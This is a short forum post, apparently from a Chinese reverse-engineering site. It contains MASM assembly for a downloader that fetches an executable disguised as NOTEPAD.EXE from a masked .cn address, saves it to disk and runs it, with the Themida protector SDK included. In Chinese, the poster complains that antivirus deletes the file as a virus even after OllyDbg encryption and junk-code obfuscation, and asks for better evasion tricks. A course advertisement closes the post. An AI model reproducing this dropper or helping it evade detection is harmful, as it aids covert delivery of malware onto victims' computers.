.386p
.model flat,stdcall
option casemap:none
include ThemidaSDK.inc
include d:\masm32\include\windows.inc
include d:\masm32\include\user32.inc
include d:\masm32\include\kernel32.inc
include d:\masm32\include\shell32.inc
include d:\masm32\include\urlmon.inc

includelib d:\masm32\lib\user32.lib
includelib d:\masm32\lib\urlmon.lib
includelib d:\masm32\lib\shell32.lib
includelib d:\masm32\lib\kernel32.lib

.data
  UrlAddr db 'http://www.*****.cn/NOTEPAD.EXE',0
  SaveFileAddr db 'C:\*****\NOTEPAD.EXE',0
.code
main:
invoke URLDownloadToFile,NULL,addr UrlAddr,addr SaveFileAddr,NULL,NULL
invoke ShellExecute,0,0,addr SaveFileAddr,0,0,SW_SHOW
invoke ExitThread,0
end main

这样会被认为病毒文件被宰掉.
我用OD手工加密+花都不行,还是被宰.不知谁有高招.请指点.

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)